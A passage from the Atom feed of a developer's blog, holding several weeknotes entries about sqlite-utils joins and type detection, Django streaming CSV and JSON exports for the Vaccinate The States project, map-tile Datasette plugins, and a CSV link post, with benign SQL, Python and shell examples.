      join t2 on t1.state = replace(t2.LongName, 'New York State', 'New York')
  group by
    t1.state
  order by
    Dist_Per_100K desc
" -t
max(t1.date)    state                       cases    deaths    Census2019    Dist_Per_100K
--------------  ------------------------  -------  --------  ------------  ---------------
2021-06-18      District of Columbia        49243      1141        705749           149248
2021-06-18      Vermont                     24360       256        623989           146257
2021-06-18      Rhode Island               152383      2724       1059361           141291
2021-06-18      Massachusetts              709263     17960       6892503           139692
2021-06-18      Maryland                   461852      9703       6045680           138193
2021-06-18      Maine                       68753       854       1344212           136894
2021-06-18      Hawaii                      35903       507       1415872           136024
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using automatically created numeric aliases &lt;code&gt;t1&lt;/code&gt; and &lt;code&gt;t2&lt;/code&gt; for the files here, but I can also use their full table names &lt;code&gt;"us-states"&lt;/code&gt; (quotes needed due to the hyphen) and &lt;code&gt;vaccination_data&lt;/code&gt; instead.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;replace()&lt;/code&gt; operation there is needed because the &lt;code&gt;vaccination_data.json&lt;/code&gt; file calls New York "New York State" while the &lt;code&gt;us-states.csv&lt;/code&gt; file just calls it "New York".&lt;/p&gt;
&lt;p&gt;The combination of &lt;code&gt;max(t1.date)&lt;/code&gt; and &lt;code&gt;group by t1.state&lt;/code&gt; is &lt;a href="http://www.sqlite.org/draft/lang_select.html#bareagg"&gt;a useful SQLite trick&lt;/a&gt;: if you perform a &lt;code&gt;group by&lt;/code&gt; and then ask for the &lt;code&gt;max()&lt;/code&gt; of a value, the other columns returned from that table will be the columns for the row that contains that maximum value.&lt;/p&gt;
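&lt;p&gt;You can see that bare-column behaviour in miniature with Python's built-in &lt;code&gt;sqlite3&lt;/code&gt; module (the table and values here are made up for illustration):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table readings (state text, date text, cases integer)")
conn.executemany(
    "insert into readings values (?, ?, ?)",
    [
        ("Vermont", "2021-06-17", 24300),
        ("Vermont", "2021-06-18", 24360),
        ("Maine", "2021-06-18", 68753),
    ],
)
# The bare cases column is taken from the row holding max(date) in each group
for row in conn.execute(
    "select state, max(date), cases from readings group by state"
):
    print(row)
# ('Maine', '2021-06-18', 68753)
# ('Vermont', '2021-06-18', 24360)
&lt;/code&gt;&lt;/pre&gt;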
&lt;p&gt;This demo is a bit of a stretch - once I reach this level of complexity I'm more likely to load the files into a SQLite database file on disk and open them up in &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; - but it's a fun example of a more complex join in action.&lt;/p&gt;
&lt;h4&gt;Also in sqlite-utils 3.10&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;sqlite-utils memory&lt;/code&gt; command has another new trick up its sleeve: it automatically detects which columns in a CSV or TSV file contain integer or float values and creates the corresponding in-memory SQLite table with the correct types. This ensures &lt;code&gt;max()&lt;/code&gt; and &lt;code&gt;sum()&lt;/code&gt; and &lt;code&gt;order by&lt;/code&gt; work in a predictable manner, without accidentally sorting &lt;code&gt;9&lt;/code&gt; as higher than &lt;code&gt;11&lt;/code&gt;.&lt;/p&gt;
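&lt;p&gt;That pitfall is easy to demonstrate in Python itself, where text values and numbers sort very differently:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Lexicographic (text) ordering vs numeric ordering
print(sorted(["9", "11", "100"]))  # ['100', '11', '9']
print(sorted([9, 11, 100]))        # [9, 11, 100]
&lt;/code&gt;&lt;/pre&gt;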
&lt;p&gt;I didn't want to break backwards compatibility for existing users of the &lt;code&gt;sqlite-utils insert&lt;/code&gt; command so I've added type detection there as a new option, &lt;code&gt;--detect-types&lt;/code&gt; or &lt;code&gt;-d&lt;/code&gt; for short:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sqlite-utils insert my.db us_states us-states.csv --csv -d
  [####################################]  100%
$ sqlite-utils schema my.db
CREATE TABLE "us_states" (
   [date] TEXT,
   [state] TEXT,
   [fips] INTEGER,
   [cases] INTEGER,
   [deaths] INTEGER
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There's more &lt;a href="https://sqlite-utils.datasette.io/en/latest/changelog.html#v3-10"&gt;in the changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Releases this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/sqlite-utils/releases/tag/3.10"&gt;3.10&lt;/a&gt; - (&lt;a href="https://github.com/simonw/sqlite-utils/releases"&gt;78 releases total&lt;/a&gt;) - 2021-06-19
&lt;br /&gt;Python CLI utility and library for manipulating SQLite databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/dogsheep/dogsheep-beta"&gt;dogsheep-beta&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/dogsheep/dogsheep-beta/releases/tag/0.10.2"&gt;0.10.2&lt;/a&gt; - (&lt;a href="https://github.com/dogsheep/dogsheep-beta/releases"&gt;20 releases total&lt;/a&gt;) - 2021-06-13
&lt;br /&gt;Build a search index across content from multiple SQLite database tables and run faceted searches against it using Datasette&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/yaml-to-sqlite"&gt;yaml-to-sqlite&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/yaml-to-sqlite/releases/tag/1.0"&gt;1.0&lt;/a&gt; - (&lt;a href="https://github.com/simonw/yaml-to-sqlite/releases"&gt;5 releases total&lt;/a&gt;) - 2021-06-13
&lt;br /&gt;Utility for converting YAML files to SQLite&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/markdown-to-sqlite"&gt;markdown-to-sqlite&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/markdown-to-sqlite/releases/tag/1.0"&gt;1.0&lt;/a&gt; - (&lt;a href="https://github.com/simonw/markdown-to-sqlite/releases"&gt;2 releases total&lt;/a&gt;) - 2021-06-13
&lt;br /&gt;CLI tool for loading markdown files into a SQLite database&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;TIL this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/vim/mouse-support-in-vim"&gt;Mouse support in vim&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="json"/><category term="projects"/><category term="sql"/><category term="sqlite"/><category term="weeknotes"/><category term="sqlite-utils"/></entry><entry><title>Weeknotes: Vaccinate The States, and how I learned that returning dozens of MB of JSON works just fine these days</title><link href="https://simonwillison.net/2021/Apr/26/vaccinate-the-states/#atom-tag" rel="alternate"/><published>2021-04-26T01:02:22+00:00</published><updated>2021-04-26T01:02:22+00:00</updated><id>https://simonwillison.net/2021/Apr/26/vaccinate-the-states/#atom-tag</id><summary type="html">
    &lt;p&gt;On Friday &lt;a href="https://www.vaccinateca.com/"&gt;VaccinateCA&lt;/a&gt; grew in scope, a lot: we launched a new website called &lt;a href="https://www.vaccinatethestates.com/"&gt;Vaccinate The States&lt;/a&gt;. Patrick McKenzie wrote &lt;a href="https://www.kalzumeus.com/2021/04/23/vaccinate-the-states/"&gt;more about the project here&lt;/a&gt; - the short version is that we're building the most comprehensive possible dataset of vaccine availability in the USA, using a combination of data collation, online research and continuing to make a huge number of phone calls.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of Vaccinate The States, showing a map with a LOT of markers on it" src="https://static.simonwillison.net/static/2021/vaccinate-the-states.png" style="max-width:100%;" /&gt;&lt;/p&gt;
&lt;p&gt;VIAL, the Django application I've been working on &lt;a href="https://simonwillison.net/tags/vaccinateca/"&gt;since late February&lt;/a&gt;, had to go through some extensive upgrades to help support this effort!&lt;/p&gt;
&lt;p&gt;VIAL has a number of responsibilities. It acts as our central point of truth for the vaccination locations that we are tracking, powers the app used by our callers to serve up locations to call and record the results, and as-of this week it's also a central point for our efforts to combine data from multiple other providers and scrapers.&lt;/p&gt;
&lt;p&gt;The data ingestion work is happening in a public repository, &lt;a href="https://github.com/CAVaccineInventory/vaccine-feed-ingest"&gt;CAVaccineInventory/vaccine-feed-ingest&lt;/a&gt;. I have yet to write a single line of code there (even though I thoroughly enjoy working on that kind of code) because I've been heads down working on VIAL itself to ensure it can support the ingestion efforts.&lt;/p&gt;
&lt;h4&gt;Matching and concordances&lt;/h4&gt;
&lt;p&gt;If you're combining data about vaccination locations from a range of different sources, one of the biggest challenges is de-duplicating the data: it's important the same location doesn't show up multiple times (potentially with slightly differing details) due to appearing in multiple sources.&lt;/p&gt;
&lt;p&gt;Our first step towards handling this involved the addition of "concordance identifiers" to VIAL.&lt;/p&gt;
&lt;p&gt;I first encountered the term "concordance" being used for this &lt;a href="https://whosonfirst.org/docs/concordances/"&gt;in the Who's On First project&lt;/a&gt;, which is building a gazetteer of every city/state/country/county/etc on earth.&lt;/p&gt;
&lt;p&gt;A concordance is an identifier in another system. Our location ID for RITE AID PHARMACY 05976 in Santa Clara is &lt;code&gt;receu5biMhfN8wH7P&lt;/code&gt; - which is &lt;code&gt;e3dfcda1-093f-479a-8bbb-14b80000184c&lt;/code&gt; in &lt;a href="https://vaccinefinder.org/"&gt;VaccineFinder&lt;/a&gt; and &lt;code&gt;7537904&lt;/code&gt; in &lt;a href="https://www.vaccinespotter.org/"&gt;Vaccine Spotter&lt;/a&gt; and &lt;code&gt;ChIJZaiURRPKj4ARz5nAXcWosUs&lt;/code&gt; in Google Places.&lt;/p&gt;
&lt;p&gt;We're storing them in a Django table called &lt;code&gt;ConcordanceIdentifier&lt;/code&gt;: each record has an &lt;code&gt;authority&lt;/code&gt; (e.g. &lt;code&gt;vaccinespotter_org&lt;/code&gt;) and an identifier (&lt;code&gt;7537904&lt;/code&gt;) and a many-to-many relationship to our &lt;code&gt;Location&lt;/code&gt; model.&lt;/p&gt;
&lt;p&gt;Why many-to-many? Surely we only want a single location for any one of these identifiers?&lt;/p&gt;
&lt;p&gt;Exactly! That's why it's many-to-many: because if we import the same location twice, then assign concordance identifiers to it, we can instantly spot that it's a duplicate and needs to be merged.&lt;/p&gt;
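&lt;p&gt;A minimal sketch of what that model can look like - the &lt;code&gt;authority&lt;/code&gt; and &lt;code&gt;identifier&lt;/code&gt; fields and the many-to-many relationship come from the description above; field lengths and the uniqueness constraint are my assumptions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from django.db import models

class ConcordanceIdentifier(models.Model):
    # The external system, e.g. "vaccinespotter_org" or "google_places"
    authority = models.CharField(max_length=64)
    # That system's ID for the location, e.g. "7537904"
    identifier = models.CharField(max_length=128)
    # Many-to-many: two imported copies of one location can share an
    # identifier, which is exactly how duplicates get spotted for merging
    locations = models.ManyToManyField("Location", related_name="concordances")

    class Meta:
        unique_together = ("authority", "identifier")
&lt;/code&gt;&lt;/pre&gt;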
&lt;h4&gt;Raw data from scrapers&lt;/h4&gt;
&lt;p&gt;&lt;code&gt;ConcordanceIdentifier&lt;/code&gt; also has a many-to-many relationship with a new table, called &lt;code&gt;SourceLocation&lt;/code&gt;. This table is essentially a PostgreSQL JSON column with a few other columns (including &lt;code&gt;latitude&lt;/code&gt; and &lt;code&gt;longitude&lt;/code&gt;) into which our scrapers and ingesters can dump raw data. This means we can use PostgreSQL queries to perform all kinds of analysis on the unprocessed data before it gets cleaned up, de-duplicated and loaded into our point-of-truth &lt;code&gt;Location&lt;/code&gt; table.&lt;/p&gt;
&lt;h4&gt;How to dedupe and match locations?&lt;/h4&gt;
&lt;p&gt;Initially I thought we would do the deduping and matching inside of VIAL itself, using the raw data that had been ingested into the &lt;code&gt;SourceLocation&lt;/code&gt; table.&lt;/p&gt;
&lt;p&gt;Since we were on a tight internal deadline it proved more practical for people to start experimenting with matching code outside of VIAL. But that meant they needed the raw data - 40,000+ location records (and growing rapidly).&lt;/p&gt;
&lt;p&gt;A few weeks ago I built a CSV export feature for the VIAL admin screens, using Django's &lt;a href="https://docs.djangoproject.com/en/3.2/ref/request-response/#django.http.StreamingHttpResponse"&gt;StreamingHttpResponse&lt;/a&gt; class combined with keyset pagination for bulk export without sucking the entire table into web server memory - &lt;a href="https://til.simonwillison.net/django/export-csv-from-django-admin"&gt;details in this TIL&lt;/a&gt;.&lt;/p&gt;
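&lt;p&gt;The core of that pattern is small enough to sketch here - this uses the &lt;code&gt;Echo&lt;/code&gt; pseudo-buffer trick from the Django documentation, with an invented &lt;code&gt;Location&lt;/code&gt; model and columns standing in for the real ones:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import csv

from django.http import StreamingHttpResponse

class Echo:
    # csv.writer needs a file-like object; we just hand each row straight back
    def write(self, value):
        return value

def export_locations_csv(request):
    writer = csv.writer(Echo())

    def rows():
        yield writer.writerow(["id", "name"])
        last_id = 0
        while True:
            # Keyset pagination: fetch the next batch after the last seen id,
            # so the whole table never sits in web server memory at once
            batch = list(
                Location.objects.filter(id__gt=last_id).order_by("id")[:500]
            )
            if not batch:
                break
            for location in batch:
                yield writer.writerow([location.id, location.name])
            last_id = batch[-1].id

    response = StreamingHttpResponse(rows(), content_type="text/csv")
    response["Content-Disposition"] = 'attachment; filename="locations.csv"'
    return response
&lt;/code&gt;&lt;/pre&gt;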
&lt;p&gt;Our data ingestion team wanted a GeoJSON export - specifically newline-delimited GeoJSON - which they could then load into &lt;a href="https://geopandas.org/"&gt;GeoPandas&lt;/a&gt; to help run matching operations.&lt;/p&gt;
&lt;p&gt;So I built a simple "search API" which defaults to returning 20 results at a time, but also has an option to "give me everything" - using the same technique I used for the CSV export: keyset pagination combined with a &lt;code&gt;StreamingHttpResponse&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;And it worked! It turns out that if you're running on modern infrastructure (Cloud Run and Cloud SQL in our case) in 2021 getting Django to return 50+MB of JSON in a streaming response works just fine.&lt;/p&gt;
&lt;p&gt;Some of these exports are taking 20+ seconds, but for a small audience of trusted clients that's completely fine.&lt;/p&gt;
&lt;p&gt;While working on this I realized that my idea of what size of data is appropriate for a dynamic web application to return more or less formed back in 2005. I still think it's rude to serve multiple MBs of JavaScript up to an inexpensive mobile phone on an expensive connection, but for server-to-server or server-to-automation-script situations serving up 50+ MB of JSON in one go turns out to be a perfectly cromulent way of doing things.&lt;/p&gt;
&lt;h4&gt;Export full results from django-sql-dashboard&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://github.com/simonw/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt; is my Datasette-inspired library for adding read-only arbitrary SQL queries to any Django+PostgreSQL application.&lt;/p&gt;
&lt;p&gt;I built the first version &lt;a href="https://simonwillison.net/2021/Mar/14/weeknotes/"&gt;last month&lt;/a&gt; to help compensate for switching VaccinateCA away from Airtable - one of the many benefits of Airtable is that it allows all kinds of arbitrary reporting, and Datasette has shown me that bookmarkable SQL queries can provide a huge amount of that value with very little written code, especially within organizations where SQL is already widely understood.&lt;/p&gt;
&lt;p&gt;While it allows people to run any SQL they like (against a read-only PostgreSQL connection with a time limit) it restricts viewing to the first 1,000 records returned - because building robust, performant pagination against arbitrary SQL queries is a hard problem to solve.&lt;/p&gt;
&lt;p&gt;Today I released &lt;a href="https://github.com/simonw/django-sql-dashboard/releases/tag/0.10a0"&gt;django-sql-dashboard 0.10a0&lt;/a&gt; with the ability to export all results for a query as a downloadable CSV or TSV file, using the same &lt;code&gt;StreamingHttpResponse&lt;/code&gt; technique as my Django admin CSV export and all-results-at-once search endpoint.&lt;/p&gt;
&lt;p&gt;I expect it to be pretty useful! It means I can run any SQL query I like against a Django project and get back the full results - often dozens of MBs - in a form I can import into other tools (including Datasette).&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of the SQL Dashboard interface, showing the new 'Export as CSV/TSV' buttons which trigger a file download dialog" src="https://static.simonwillison.net/static/2021/export-csv-dashboard.png" style="max-width:100%;" /&gt;&lt;/p&gt;
&lt;h4&gt;TIL this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/django/django-admin-horizontal-scroll.md"&gt;Usable horizontal scrollbars in the Django admin for mouse users&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/django/filter-by-comma-separated-values.md"&gt;Filter by comma-separated values in the Django admin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/postgresql/constructing-geojson-in-postgresql.md"&gt;Constructing GeoJSON in PostgreSQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/django/export-csv-from-django-admin.md"&gt;Django Admin action for exporting selected rows as CSV&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Releases this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/django-sql-dashboard/releases/tag/0.10a1"&gt;0.10a1&lt;/a&gt; - (&lt;a href="https://github.com/simonw/django-sql-dashboard/releases"&gt;21 total releases&lt;/a&gt;) - 2021-04-25
&lt;br /&gt;Django app for building dashboards using raw SQL queries&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-admin"&gt;django-admin&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vaccines"&gt;vaccines&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vaccinate-ca"&gt;vaccinate-ca&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="django"/><category term="django-admin"/><category term="postgresql"/><category term="projects"/><category term="vaccines"/><category term="weeknotes"/><category term="vaccinate-ca"/><category term="django-sql-dashboard"/></entry><entry><title>Weeknotes: Mostly messing around with map tiles</title><link href="https://simonwillison.net/2021/Feb/7/weeknotes/#atom-tag" rel="alternate"/><published>2021-02-07T05:53:19+00:00</published><updated>2021-02-07T05:53:19+00:00</updated><id>https://simonwillison.net/2021/Feb/7/weeknotes/#atom-tag</id><summary type="html">
    &lt;p&gt;Most of what I worked on this week was covered in &lt;a href="https://simonwillison.net/2021/Feb/4/datasette-tiles/"&gt;Serving map tiles from SQLite with MBTiles and datasette-tiles&lt;/a&gt;. I built two new plugins: &lt;a href="https://datasette.io/plugins/datasette-tiles"&gt;datasette-tiles&lt;/a&gt; for serving map tiles, and &lt;a href="https://datasette.io/plugins/datasette-basemap"&gt;datasette-basemap&lt;/a&gt; which bundles map tiles for zoom levels 0-6 of OpenStreetMap. I also released &lt;a href="https://datasette.io/tools/download-tiles"&gt;download-tiles&lt;/a&gt; for downloading tiles and bundling them into an MBTiles database.&lt;/p&gt;
&lt;h4&gt;sqlite-utils 3.4.1&lt;/h4&gt;
&lt;p&gt;I added one new feature to &lt;a href="https://sqlite-utils.datasette.io/"&gt;sqlite-utils&lt;/a&gt;: the &lt;code&gt;sqlite-utils insert&lt;/code&gt; command can now be configured to read CSV files using alternative delimiters, by passing the &lt;code&gt;--delimiter&lt;/code&gt; option or the &lt;code&gt;--quotechar&lt;/code&gt; option.&lt;/p&gt;
&lt;p&gt;This is &lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#cli-insert-csv-tsv-delimiter"&gt;covered in the documentation&lt;/a&gt;, which provides the following example:&lt;/p&gt;
&lt;pre lang="csv"&gt;&lt;code&gt;name;description
Cleo;|Very fine; a friendly dog|
Pancakes;A local corgi
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Imported using:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;sqlite-utils insert dogs.db dogs dogs.csv \
  --delimiter=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; --quotechar=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;|&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
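&lt;p&gt;Python's standard-library &lt;code&gt;csv&lt;/code&gt; module takes the same two options, which is a handy way to sanity-check a file before importing it - a quick sketch against the example file above:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import csv

with open("dogs.csv", newline="") as f:
    # Same delimiter and quote character as the sqlite-utils invocation above
    for row in csv.DictReader(f, delimiter=";", quotechar="|"):
        print(row)
# {'name': 'Cleo', 'description': 'Very fine; a friendly dog'}
# {'name': 'Pancakes', 'description': 'A local corgi'}
&lt;/code&gt;&lt;/pre&gt;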
&lt;h4&gt;Datasette 0.54.1&lt;/h4&gt;
&lt;p&gt;I spotted a subtle but nasty regression in Datasette: a change I made to how hidden form fields worked on the table page meant that clearing the &lt;code&gt;_search&lt;/code&gt; search input and re-submitting the form didn't take effect, and the search would persist. &lt;a href="https://docs.datasette.io/en/stable/changelog.html#v0-54-1"&gt;Datasette 0.54.1&lt;/a&gt; fixes that bug.&lt;/p&gt;
&lt;h4&gt;Releases this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-jellyfish"&gt;datasette-jellyfish&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-jellyfish/releases/tag/1.0.1"&gt;1.0.1&lt;/a&gt; - 2021-02-06
&lt;br /&gt;Datasette plugin adding SQL functions for fuzzy text matching powered by Jellyfish&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/sqlite-utils/releases/tag/3.4.1"&gt;3.4.1&lt;/a&gt; - 2021-02-06
&lt;br /&gt;Python CLI utility and library for manipulating SQLite databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-tiles"&gt;datasette-tiles&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-tiles/releases/tag/0.5"&gt;0.5&lt;/a&gt; - 2021-02-04
&lt;br /&gt;Mapping tile server for Datasette, serving tiles from MBTiles packages&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/download-tiles"&gt;download-tiles&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/download-tiles/releases/tag/0.4"&gt;0.4&lt;/a&gt; - 2021-02-03
&lt;br /&gt;Download map tiles and store them in an MBTiles database&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-basemap"&gt;datasette-basemap&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-basemap/releases/tag/0.2"&gt;0.2&lt;/a&gt; - 2021-02-02
&lt;br /&gt;A basemap for Datasette and datasette-leaflet&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette"&gt;datasette&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette/releases/tag/0.54.1"&gt;0.54.1&lt;/a&gt; - 2021-02-02
&lt;br /&gt;An open source multi-tool for exploring and publishing data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-cluster-map"&gt;datasette-cluster-map&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-cluster-map/releases/tag/0.17.1"&gt;0.17.1&lt;/a&gt; - 2021-02-01
&lt;br /&gt;Datasette plugin that shows a map for any data with latitude/longitude columns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-leaflet"&gt;datasette-leaflet&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-leaflet/releases/tag/0.2.2"&gt;0.2.2&lt;/a&gt; - 2021-02-01
&lt;br /&gt;Datasette plugin adding the Leaflet JavaScript library&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;TIL this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/til/til/sqlite_splitting-commas-sqlite.md"&gt;Splitting on commas in SQLite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/til/til/datasette_serving-mbtiles.md"&gt;Serving MBTiles with datasette-media&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/til/til/gis_mapzen-elevation-tiles.md"&gt;Downloading MapZen elevation tiles&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/leaflet"&gt;leaflet&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="datasette"/><category term="weeknotes"/><category term="sqlite-utils"/><category term="leaflet"/></entry><entry><title>CSVs: The good, the bad, and the ugly</title><link href="https://simonwillison.net/2020/Nov/5/csvs-good-bad-and-ugly/#atom-tag" rel="alternate"/><published>2020-11-05T17:19:05+00:00</published><updated>2020-11-05T17:19:05+00:00</updated><id>https://simonwillison.net/2020/Nov/5/csvs-good-bad-and-ugly/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://alexgaynor.net/2020/sep/24/csv-good-bad-ugly/"&gt;CSVs: The good, the bad, and the ugly&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Useful, thoughtful summary of the pros and cons of the most common format for interchanging data.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/alex_gaynor/status/1309269404534878215"&gt;@alex_gaynor&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/alex-gaynor"&gt;alex-gaynor&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;&lt;/p&gt;



</summary><category term="alex-gaynor"/><category term="csv"/></entry><entry><title>Weeknotes: Datasette Writes</title><link href="https://simonwillison.net/2020/Feb/26/weeknotes-datasette-writes/#atom-tag" rel="alternate"/><published>2020-02-26T06:34:46+00:00</published><updated>2020-02-26T06:34:46+00:00</updated><id>https://simonwillison.net/2020/Feb/26/weeknotes-datasette-writes/#atom-tag</id><summary type="html">
    &lt;p&gt;As &lt;a href="https://simonwillison.net/2020/Jan/21/weeknotes-datasette-cloud-and-zero-downtime-deployments/#datasette-upload-csvs"&gt;discussed previously&lt;/a&gt;, the biggest hole in Datasette's feature set at the moment involves writing to the database.&lt;/p&gt;

&lt;p&gt;Datasette was born as a hack to abuse serverless, stateless hosting by bundling a static, immutable database as part of the deployment. The key idea was that for some use-cases - such as data journalism - you don't need to be able to continually update your data. It's just the facts that support the story you are trying to tell.&lt;/p&gt;

&lt;p&gt;I also believed the conventional wisdom that SQLite is fine for reads but shouldn't be trusted to handle web application writes. I no longer believe this to be the case: SQLite is &lt;em&gt;great&lt;/em&gt; at handling writes, as millions of iPhone and Android apps will attest.&lt;/p&gt;

&lt;p&gt;Meanwhile, the biggest blocker to people trying out Datasette is that they would need to convert their data to SQLite somehow in order to use it. I've been building &lt;a href="https://datasette.readthedocs.io/en/stable/ecosystem.html#tools-for-creating-sqlite-databases"&gt;a family of CLI tools for this&lt;/a&gt;, but that requires users to both be familiar with the command-line and to &lt;em&gt;install software on their computers&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;So: Datasette needs to grow web-based tools for loading data into the database.&lt;/p&gt;

&lt;p&gt;Datasette's &lt;a href="https://datasette.readthedocs.io/en/stable/plugins.html"&gt;plugin system&lt;/a&gt; is the ideal space for experimenting with ways of doing this, without needing to try out crazy new features on Datasette's own core.&lt;/p&gt;

